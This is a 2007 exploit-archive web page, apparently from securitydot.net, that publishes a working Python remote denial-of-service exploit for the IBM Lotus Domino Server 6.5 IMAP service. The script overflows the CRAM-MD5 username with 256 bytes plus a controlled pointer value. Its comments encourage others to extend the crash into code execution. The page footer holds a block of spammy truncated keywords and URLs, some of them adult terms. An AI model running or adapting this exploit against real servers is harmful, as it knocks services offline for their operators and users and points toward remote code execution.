about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , IBM Lotus Domino Server 6.5 (username) Remote Denial of Service Exploit




2007-03-30 IBM Lotus Domino Server 6.5 (username) Remote Denial of Service Exploit
Rated as : Critical

#!/usr/bin/python
#
# Remote DOS exploit code for IBM Lotus Domino Server 6.5. Tested on
windows
# 2000 server SP4. The code crashes the IMAP server. Since this is a
simple DOS
# where 256+ (but no more than 270) bytes for the username crashes the
service
# this is likely to work on other windows platform aswell. Maybe someone
can carry this further and come out
# with a code exec exploit.
#
# Author shall bear no reponsibility for any screw ups caused by using
this code
# Winny Thomas :-)
#

import sys
import md5
import struct
import base64
import socket

def ExploitLotus(target):
       sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
       sock.connect((target, 143))
       response = sock.recv(1024)
       print response


       auth = 'a001 authenticate cram-md5\r\n'
       sock.send(auth)
       response = sock.recv(1024)
       print response

       # prepare digest of the response from server
       m = md5.new()
       m.update(response[2:0])
       digest = m.digest()

       payload = 'A' * 256
       # the following DWORD is stored in ECX
       # at the time of overflow the following call is made
       # call dword ptr [ecx]. However i couldnt find suitable conditions
under which a stable pointer to our shellcode
       # could be used. Actually i have not searched hard enough :-).
       payload += struct.pack('<L', 0x58585858)

       # Base64 encode the user info to the server
       login = payload + ' ' + digest
       login = base64.encodestring(login) + '\r\n'

       sock.send(login)
       response = sock.recv(1024)
       print response

if __name__=="__main__":
       try:
               target = sys.argv[1]
       except IndexError:
               print 'Usage: %s <imap server>\n' % sys.argv[0]
               sys.exit(-1)

       ExploitLotus(target)

securitydot.net - 2007-03-30

Advertising

Copyright 2007, SecurityDot
Thu, 26 Nov 2009 03:09:05 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.artech kaka hi.baidu.c www.ailuoh hi.baidu.c www.lierm. Sexy.girls www.12zuo. hot vdo Sex.Com vi www.youtub www.lierm. Www sex co zgymw.com kaka news for c Www.seks.k MASA www.15xiu. DAV apache amule OFFICE lo953l www.xxxfol audalt www.dadita Monkey_Boa www.shangh www.168tl. Wwwgoogilc BNB SURVEY www.Sex18. Wwwgoogilc www.freego www.electr Pakistan sexy4 Nipples of news for c www.18wear jwalk www.0576xi www.dykaih Sexy.girls 9aimimi.cn &amp;a oday explo 73suncity. www.tuigua www.337s.c